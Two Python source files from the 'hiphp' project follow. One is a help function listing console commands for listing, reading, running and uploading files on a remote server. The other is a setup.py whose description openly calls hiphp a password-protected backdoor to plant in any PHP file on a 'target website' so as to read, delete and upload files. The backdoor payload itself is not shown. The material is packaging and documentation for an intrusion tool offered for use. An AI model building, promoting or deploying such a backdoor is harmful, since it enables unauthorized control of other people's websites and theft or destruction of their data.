#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
def help():
    help_text="""
hiphp Commands :
════════════════
         Command                    Description
         -------                    -----------
[OPTIONS]─────┐
  ┌───────────┘
  ├─> --help                        ─> # Display this help.
  ├─> --geth                        ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
  ├─> --phpinfo                     ─> # Some information about the server.
  ├─> --cls                         ─> # Clear console.
  ├─> --exit                        ─> # Exit this console.
┌─┘
└[ACTIONS]────┐
  ┌───────────┘
  ├─> --ls                          ─> # List information about the FILEs (the current directory by default).
  ├─> Usage: --ls [OPTION] [PATH]
  ├┬> Mandatory arguments to long options:
  │├─> --ls                         ─> # Get a list of all files and folders from the current directory.
  │├─> --ls [PATH]                  ─> # Get a list of all files and folders from a specified directory.
  │├─> --ls -all                    ─> # Get a list of all files, folders and subfolders from the current directory.
  │└─> --ls -all [PATH]             ─> # Get a list of all files, folders and subfolders from a specified directory.
  ├─────────────────────────── ─ ─ ─
  ├─> --cat                         ─> # Concatenate FILE to standard output.
  ├─> Usage: --cat [FILE_PATH]
  ├─────────────────────────── ─ ─ ─
  ├─> --set                         ─> # Create a code that is always saved on during work.
  ├─> Usage: --set [PHP_CODE]
  ├─> You can return the initial value with "--dset".
  ├─────────────────────────── ─ ─ ─
  ├─> --rf                          ─> # Run code from file.
  ├─> Usage: --rf [FILE_PATH] [VARIABLES]
  ├┬> Mandatory arguments to long options:
  │├─> --rf [FILE_PATH]             ─> # Run code from file.
  │└─> --rf [FILE_PATH] [VARIABLES] ─> # Run code from file with variables, EX: --rf example.php var==1 var2==hello
  ├─────────────────────────── ─ ─ ─
  ├─> --up                          ─> # Upload a file.
  ├─> Usage: --up [FILE_PATH] [PATH]
  ├┬> Mandatory arguments to long options:
  │├─> --up [FILE_PATH]             ─> # Upload a file to the current directory.
  │└─> --up [FILE_PATH] [PATH]      ─> # Upload a file to a specified directory.
┌─┘
└[ABOUT]─────┐
  ┌──────────┘
  ├─> --update                      ─> # check for updates.
  ├─> --license                     ─> # This project license.
  ├─> --about                       ─> # About this project.
  .
  .
  ."""
    return help_text
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
from hiphp.hiphpversion import __version__
from setuptools import setup,find_packages

setup(
    name="hiphp",
    version=__version__,
    author="yasserbdj96",
    author_email="yasser.bdj96@gmail.com",
    description='''hiphp is BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.''',
    long_description_content_type="text/markdown",
    long_description=open('README.md','r', encoding="utf8").read(),
    license='''MIT License''',
    packages=find_packages(),
    project_urls={
        'Source': "https://github.com/yasserbdj96/hiphp",
        'Documentation': "https://yasserbdj96.github.io/hiphp",
        'Chat': "https://gitter.im/yasserbdj96/hiphp",
        'WebSite':"https://yasserbdj96.github.io/"
    },
    install_requires=["ashar","requests","hexor","asciitext","biglibrary"],
    keywords=['yasserbdj96', 'python', 'hiphp', 'php', 'backdoor.', 'http/https','onion'],
    classifiers=[
        "Environment :: Web Environment",
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3 :: Only",
        "Operating System :: Unix",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: Microsoft :: Windows",
        "Topic :: Software Development :: Build Tools",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development :: Libraries :: Python Modules",
        'Topic :: Communications :: Email',
        "Topic :: Internet :: WWW/HTTP"
    ],
    python_requires=">=3.x.x"
)
#}END.